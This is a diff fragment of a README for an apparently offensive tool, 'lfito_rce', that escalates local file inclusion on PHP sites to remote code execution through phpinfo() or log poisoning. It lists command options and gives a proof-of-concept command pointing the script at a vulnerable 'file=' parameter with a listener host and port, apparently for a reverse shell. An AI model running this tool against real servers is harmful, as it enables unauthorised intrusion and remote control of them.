roughiz/lfito_rce/README.md

                         default the end request is empty -v VERBOSE, --verbose VERBOSE
-                        Define verbose output. set to False by default
+                        Define verbose output. set to False by default -t THREADS, --threads THREADS
+                        [For phpinfo action].
+Threads number, set to 10 by default
+  -i PHPINFO, --phpinfo PHPINFO
+                        [For phpinfo action].
+Define the url path of the "phpinfo" script.
+Per ex: "http://host/phpinfo.php" -f LOGFILE, --logfile LOGFILE
+                        [For controlled log action].
+Define the path of the http server log file.
+By default script will use bruteforce

 ```

 # POC
+#### About LFI to RCE via phpinfo()

 ```
 $ python phpinfolfi_rce.py -l "http://host/browse.php?file=" --lhost 127.0.0.1 --lport 9001  -t 12  -i "http://host:8080/phpinfo.php"